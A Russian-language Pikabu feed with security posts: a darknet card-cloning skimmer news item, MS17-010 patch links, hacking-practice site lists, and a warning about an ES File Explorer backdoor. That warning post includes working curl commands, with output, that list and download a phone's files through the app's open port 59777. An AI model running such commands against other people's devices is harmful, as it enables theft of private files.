«Contactless Infusion X5 – первое устройство для хакинга бесконтактных банковских карт на черном рынке. Продукт был создан и разработан The CC Buddies. Contactless Infusion X5 способен распознать и считать карту ЛЮБОГО банка на расстоянии всего 8 сантиметров! Чтение происходит на потрясающей скорости — 1024 кбит/с, то есть этот мощный бесконтактный ридер считывает примерно 15 банковских карт в секунду!»

— пишут создатели устройства в своем объявлении.


Contactless Infusion X5 собирает данные о номере карты и сроке ее действия. Если RFID чип карты также содержит и другие данные, будь то имя владельца, его адрес или выписка о последних операциях по счету, прибор похитит и эту информацию. Создатели устройства утверждают, что оно читает данные о любых карт на частоте 13,56 МГц.


Информацию о картах Contactless Infusion X5 хранит в зашифрованном виде. Программа, которую предоставляют злоумышленники, позволит расшифровать данные и скачать их на компьютер, работающий под управлением Windows XP или выше. Затем можно приступать к печати фальшивых копий. Пока ПО хакерской группы работает только с банковскими картами, но в будущем авторы обещают расширить его функциональность.

В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду Длиннопост, Устройство, Хакеры, Даркнет, Продажа, Клоны, Бесконтакная карта, Банковская карта
Свое устройство The CC Buddies оценили в 1,2 биткоина (порядка $825 по текущему курсу). Девайсы покупателям будут отправлены обычной почтой. В комплекте с каждым устройством поставляется кабель USB 3.0 для зарядки и передачи данных, специальный софт, а также 20 чистых «болванок» для изготовления банковских карт. Сообщается, что три часа подзарядки гарантируют десять часов работы устройства. Ниже можно ознакомиться с полными техническими характеристиками Contactless Infusion X5.
В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду Длиннопост, Устройство, Хакеры, Даркнет, Продажа, Клоны, Бесконтакная карта, Банковская карта
Показать полностью 2
3116

Ссылки на обновления Microsoft (MS17-010) от уязвимостей, эксплуатируемых Wana Decrypt0r

Каталог обновлений Microsoft под наплывом желающих сейчас очень плохо выдаёт ссылки, поэтому решил потратить время и поделиться ссылками сюда


Windows XP: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Vista x86: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Vista x64: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Server 2008 x86: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Server 2008 x64: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows 7 x86: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows 7 x64: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Server 2008 R2: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows 8 x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 8 x64: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows Server 2012: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 8.1 x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 8.1 x64: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows Server 2012 R2: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 x64: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 (1511) x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 (1511) x64: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 (1607) x86: http://download.windowsupdate.com/c/msdownload/update/softwa...

Windows 10 (1607) x64: http://download.windowsupdate.com/d/msdownload/update/softwa...

Windows Server 2016: http://download.windowsupdate.com/d/msdownload/update/softwa...


upd:

Windows XP x64: http://download.windowsupdate.com/d/csa/csa/secu/2017/02/win...

Windows Server 2003 x86: http://download.windowsupdate.com/c/csa/csa/secu/2017/02/win...

Windows Server 2003 x64: http://download.windowsupdate.com/c/csa/csa/secu/2017/02/win...


Вирус распространяется через 445 порт (его использует samba, служба доступа к файлам), эксплуатирует уязвимость в SMBv1 протоколе (эту устаревшую версию можно отключить отдельно: https://support.microsoft.com/en-us/help/2696547/how-to-enab...).


Подвержены опасности компьютеры, напрямую подключенные к интернету (без NAT/firewall), также есть случаи заражения через UPnP конечных компьютеров (пользователь заходит на зараженный сайт/скачивает вирус, тот пробрасывает 445 порт на этот компьютер, заражает компьютер, затем распространяется тем же методом по локальной сети). Буду рад различным тех. подробностям в комментариях, в том числе актуальной информации о реакции антивирусов.


Делайте бэкапы, недоступные через сеть или интернет простыми способами!

Придумав способ резервного копирования, спросите себя: как может мой бэкап пострадать, какие у моего способа уязвимости? Если есть хитрожопый злоумышленник, как он смог бы лишить меня моих данных?

Показать полностью
100

Справочник для пентестера.

Внимание! Информация, представленная на данной странице или доступная с данной веб-ссылки, размещена исключительно в ознакомительных целях и не представляет собой консультацию или совет.

Справочник для пентестера. Rtfm, Человек, Пентестер
Red Team Field Manual (RTFM) представляет собой справочник на 100 страниц для пентестера — обо всем понемногу на платформах Windows, Cisco IOS, также затрагивающий различные сценарии в Powershell, Python и Scapy, и упоминающий несколько удобных Linux-команд.

Документ в формате .pdf

https://drive.google.com/open?id=0Bw1tpOoY9MYrOFpyak5EdEhKRj...

2099

22 сайта для практики хакинга и защиты

22 сайта для практики хакинга и защиты Взлом, Безопасность, Сайт, Тренинг, Хакерство, Практика, Длиннопост

Навыки в информационной безопасности сейчас пользуются большим спросом. Так как люди стремятся из всего сделать приложение и подключить к интернету даже самые примитивные устройства, спрос будет только расти. Поэтому неудивительно, что сегодня все хотят научиться хакингу.

Однако на множестве форумов можно встретить новичков, которые не знают, с чего начать изучение хакинга или где его попрактиковать. Специально для них мы представляем подборку сайтов, на которых можно приобрести и улучшить навыки хакинга.


Приведённые ниже площадки доступны только на английском языке.

1.CTF365- ctf365.com

Пользователи CTF365 устанавливают и защищают свои собственные серверы одновременно с атаками на серверы других пользователей. CTF365 подойдёт профессионалам в области безопасности, которые хотят приобрести наступательные навыки, или системным администраторам, заинтересованным в улучшении своих защитных навыков. Если вы новичок в инфосеке, вы можете зарегистрировать бесплатную учетную запись для начинающих и познакомиться с ним с помощью нескольких предварительно настроенных уязвимых серверов.

2.OVERTHEWIRE- overthewire.org/wargames

OverTheWire подойдёт всем желающим изучить теорию информационной безопасности и применить её на практике независимо от своего опыта. Новичкам следует начать с задач уровня Bandit, поскольку они необходимы для дальнейшего решения других задач.

3.HACKING-LAB- www.hacking-lab.com/index.html

Hacking-Lab предоставляют задачи CTF для European Cyber Security Challenge, но они также проводят на своей платформе регулярные соревнования, в которых может участвовать каждый. Просто зарегистрируйтесь, настройте vpn и выберите себе задачу по вкусу.

4.PWNABLE.KR- pwnable.kr

Данная площадка фокусируется на pwn-задачах, подобных CTF, суть которых заключается в поиске, чтении и отправке файлов-флагов, которые есть в каждой задаче. Для доступа к содержимому файлов вы должны использовать навыки программирования, реверс-инжиниринга или эксплуатации уязвимостей, прежде чем сможете отправить решение.

Задачи делятся на 4 уровня сложности: лёгкий — для новичков, средний, сложный и хардкор, где задачи требуют нестандартных подходов для решения.

5.IO- io.netgarage.org

IO — это варгейм от создателей netgarage.org, сообщества, в котором единомышленники делятся знаниями о безопасности, искусственном интеллекте, VR и многом другом. Было создано 3 версии варгейма: IO, IO64 и IOarm, из них всех IO является наиболее зрелой. Подключайтесь к IO через SSH и можете приниматься за работу.

6.SMASHTHESTACK- smashthestack.org

SmashTheStack состоит из 7 различных варгеймов: Amateria, Apfel (в настоящее время офлайн), Blackbox, Blowfish, CTF (в настоящее время офлайн), Logic и Tux. Каждый варгейм содержит множество задач, начиная от стандартных уязвимостей и заканчивая задачами на реверс-инжиниринг.

7.MICROCORRUPTION- microcorruption.com/login

Microcorruption представляет собой CTF, в котором вам нужно «зареверсить» вымышленные электронные блокирующие устройства Lockitall. Устройства Lockitall защищают облигации, размещённые на складах, принадлежащих вымышленной компании Cy Yombinator. На пути к краже облигаций вы познакомитесь с ассемблером, узнаете, как использовать отладчик, пошагово выполнять код, устанавливать точки останова и исследовать память.

8.REVERSING.KR- reversing.kr/index.php

Здесь вы можете найти 26 задач для проверки ваших навыков взлома и реверс-инжиниринга. Сайт не обновлялся с конца 2012 года, но имеющиеся задачи по-прежнему являются ценными учебными ресурсами.

9.HACK THIS SITE- www.hackthissite.org

Hack This Site — бесплатный сайт c варгеймами для проверки и улучшения ваших навыков хакинга. Нам нём можно найти множество хакерских задач в нескольких категориях, включая базовые задачи, реалистичные задачи, приложения, программирование, фрикинг, JavaScript, форензику, стеганографию и т.д. Также сайт может похвастаться активным сообществом с большим каталогом хакерских статей и форумом для обсуждения вопросов, связанных с безопасностью. Недавно было объявлено, что кодовая база сайта будет пересмотрена, поэтому в ближайшие месяцы можно ожидать большие улучшения.

10.W3CHALLS- w3challs.com

W3Challs — это обучающая платформа с множеством задач в различных категориях, включая хакинг, варгеймы, форензику, криптографию, стеганографию и программирование. Цель платформы — предоставить реалистичные задачи. В зависимости от сложности решённой задачи вы получаете баллы. Также есть форум, на котором можно обсуждать и решать задачи с другими участниками.

11.PWN0- pwn0.com

Площадка pwn0 — это VPN, в которой происходит почти всё, что угодно. Сражайтесь против ботов или пользователей и набирайте очки, получая контроль над другими системами.

12.EXPLOIT EXERCISES- exploit-exercises.com

Exploit Exercises предлагает множество виртуальных машин, документацию и задачи, которые пригодятся в изучении повышения привилегий, анализа уязвимостей, разработки эксплойтов, отладки, реверс-инжиниринга и т.д.

13.RINGZER0 TEAM ONLINE CTF- ringzer0team.com

RingZer0 Team Online CTF предлагает более 200 задач, которые позволят вам проверить навыки взлома по нескольким направлениям — от криптографии, анализа вредоносных программ до SQL-инъекции, шеллкодинга и многого другого. После того, как вы нашли решение задачи, вы можете отправить его RingZer0 Team. Если ваше решение будет принято, вы получите RingZer0Gold, которое можно обменять на подсказки во время решения задач.

14.HELLBOUND HACKERS- www.hellboundhackers.org

На Hellbound Hackers можно найти традиционные задачи с эксплойтами и такие форматы задач, которых нет на других ресурсах. Например, патчинг приложений и задачи, ограниченные по времени. В задачах с патчингом вам даётся уязвимый фрагмент кода и вам нужно предложить исправление этой уязвимости.

15.TRY2HACK- www.try2hack.nl

Try2Hack — один из старейших сайтов по улучшению навыков хакинга, который всё ещё остаётся на плаву. Он предлагает несколько задач, чтобы развлечься. Задачи разнообразны и по мере продвижения становятся всё сложнее.

16.HACK.ME- hack.me

Hack.me представляет собой большую коллекцию уязвимых веб-приложений для применения навыков взлома на практике. Все приложения предоставляются сообществом и каждое из них можно запустить «на лету» в безопасной, изолированной песочнице.

17.HACKTHIS!!- www.hackthis.co.uk

HackThis!! состоит из 50+ задач разного уровня, за решение каждой из которых вы получаете определённое количество очков в зависимости от уровня сложности. Подобно Hack This Site, у HackThis!! также есть живое сообщество, многочисленные статьи и новости о хакинге, а также форум, на котором вы можете обсудить задачи и вопросы, связанные с безопасностью.

18.ENIGMA GROUP- www.enigmagroup.org

Enigma Group содержит более 300 задач с акцентом на топ-10 эксплойтов OWASP. Сайт имеет почти 48000 активных участников и проводит еженедельные CTF-соревнования, а также еженедельные и ежемесячные конкурсы.

19.GOOGLE GRUYERE- google-gruyere.appspot.com

Google Gruyere показывает, как можно эксплуатировать уязвимости веб-приложений и как от этого защититься. Вы сможете провести реальное тестирование на проникновение и фактически взломать настоящее приложение, используя атаки вроде XSS и XSRF.

20.GAME OF HACKS- www.gameofhacks.com

Game of Hacks показывает вам набор фрагментов кода в виде викторины с несколькими вариантами выбора, а вы должны определить правильную уязвимость в коде. Этот сайт немного выделяется из этого списка, но тем не менее это хорошая игра для выявления уязвимостей в коде.

21.ROOT ME- www.root-me.org

Root Me предлагает более 200 задач и более 50 виртуальных сред, позволяющих вам применить на практике свои навыки взлома в различных сценариях. Это определённо один из лучших сайтов в данном списке.

22.CTFTIME- ctftime.org

Хотя CTFtime не является хакерским сайтом, как другие в этом списке, это отличный ресурс, чтобы оставаться в курсе CTF-соревнований, происходящих по всему миру. Поэтому, если вы заинтересованы в присоединении к CTF-команде или участии в соревновании, вам стоит сюда заглянуть.

Перевод https://tproger.ru/translations/23-hacking-sites-for-practic...

Первоисточник https://hackerlists.com/hacking-sites/

Показать полностью
2038

Практики по курсу "Компьютерные сети" + Бонус.

Анализатор сети Wireshark
Канальный уровень в Wireshark
Wi-Fi джунгли
Протокол IP
Инкапсуляция
Протокол DHCP в Wireshark
Протокол ARP
Протокол ICMP в Wireshark
Порты на транспортном уровне
FTP в Wireshark
Протокол DNS в Wireshark

P.S. бонус в комментариях.

Показать полностью 8
1352

Бэкдор в ES File Explorer File Manager, позволяющий скачать любой файл из твоего телефона

Цель данного поста - предупредить пользователей и предостеречь от использования дырявого говнопродукта, автор не призывает использовать приведённую ниже информацию для получения доступа к чужим данным, т.к. можно получить путёвку на 2 года с бесплатным шампанским.


Недавно нашли бэкдор в ES File Manager, приложение просто создало http сервер не защищённый паролем на порту 59777, который позволяет получить список всех файлов, приложений, скачать файлы, запустить любое из установленных приложений и многое другое, ES File Manager об этом, естественно, никак не предупреждает пользователя. Таким образом, чувак из той же сети(например в маке) может получить доступ ко всем вашим файлам.


Вроде первый написал этот чувак https://twitter.com/fs0c131y/status/1085460755313508352

Вот тут сделали скрипт для работы с сервером https://github.com/fs0c131y/ESFileExplorerOpenPortVuln


Я скрипт не запускал, а воспользовался curl'ом


Пишем:

> curl --header "Content-Type: application/json" -X POST http://192.168.1.3:59777/ --data '{"command":"listPics"}'

Где 192.168.1.3 - IP моего телефона в сети. Получаем список всех фоток на телефоне:

[

{"name":"IMG_20180802_192056_HHT.jpg", "time":"8/2/18 08:20:56 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180802_192056_HHT.jpg", "size":"1.64 MB (1,720,783 Bytes)", },

{"name":"IMG_20180728_160906.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_160906.jpg", "size":"4.69 MB (4,914,234 Bytes)", },

{"name":"IMG_20180801_120928.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180801_120928.jpg", "size":"5.68 MB (5,951,479 Bytes)", },

{"name":"IMG_20180728_132235.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_132235.jpg", "size":"4.94 MB (5,176,983 Bytes)", },

{"name":"IMG_20180728_155557.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_155557.jpg", "size":"4.08 MB (4,275,890 Bytes)", },

{"name":"IMG_20180730_103456.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180730_103456.jpg", "size":"3.60 MB (3,776,144 Bytes)", },

Скачивать вот так:

> curl --header "Content-Type: application/json" http://192.168.1.3:59777/storage/2C7B-180C/DCIM/Camera/IMG_2... > /tmp/pic.jpg

Только что поставил последнюю версию с play маркета, запустил - бекдор есть.

Месяц музыки и звука на Пикабу. Делайте громче!

Месяц музыки и звука на Пикабу. Делайте громче!

Рекламный отдел Пикабу и LG опять с конкурсами и подарками. Октябрь торжественно объявляем месяцем музыки и звука. На этот раз мы разыграем не только UltraWide-монитор (вот такой), но и умную колонку с «Алисой» (вот такую). Но обо всем по порядку.


Что происходит?

Вместе с LG мы устраиваем тематические месяцы. Сентябрь был посвящен учебе. Мы советовали сайты с лекциями, проводили мастер-класс по созданию гифок и рассказывали, что делают студенты-технари. Вы писали посты на конкурс и голосовали за лучший. Победителем стал @kka2012. Скоро он получит от нас ультраширокий монитор, чтобы еще быстрее писать свои юридические истории!


Как поучаствовать?

В октября ждем ваши посты на тему музыки и звука. Сделайте подборку любимых подкастов, аудиокниг или музыкальных клипов. Расскажите, как увлеклись монтажом, сделали пару крутых ремиксов или пошли на уроки вокала. Что угодно! Чтобы участвовать в конкурсе, нужно поставить в посте тег #звук или #музыка и метку [моё].


Еще раз коротко:

– Напишите пост на тему месяца (октябрь — музыки и звука) до 25 октября включительно.

– Поставьте тег #звук или #музыка и метку [моё].

– Все! Терпеливо ждите голосования.


За первое место дарим 29-дюймовый монитор LG, а за второе – умную колонку LG с «Алисой». Удачи!

Отличная работа, все прочитано!